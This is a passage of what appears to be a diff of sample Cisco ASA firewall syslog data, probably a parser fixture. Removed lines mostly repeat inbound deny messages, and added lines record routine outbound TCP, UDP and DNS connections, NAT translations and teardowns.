inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 